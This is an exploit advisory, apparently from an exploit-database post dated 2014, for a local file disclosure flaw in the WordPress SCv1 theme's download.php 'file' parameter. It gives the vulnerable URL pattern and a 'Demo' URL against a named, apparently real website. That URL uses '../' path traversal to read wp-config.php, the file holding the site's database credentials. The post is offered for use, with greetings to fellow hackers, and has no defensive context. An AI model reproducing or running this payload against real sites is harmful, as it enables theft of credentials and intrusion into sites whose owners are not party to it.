[+] Title : Wordpress SCv1 Theme Local File Disclosure
[+] Discovered By : Medrik
[+] CMS Home-Page : http://wordpress.org
[+] Found Date : 2014-06-10
[+] Tested On : Windows


This is LFD Vulnerability In :

File : download.php
Parameter : file


Vulnerability (Locate) :

http://Vulnerable_Host/wp-content/themes/SCv1/download.php?file=[LFD]

Demo :

http://susannahcahalan.com/wp-content/themes/SCv1/download.php?file=../../../../wp-config.php


Spc Tnx : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT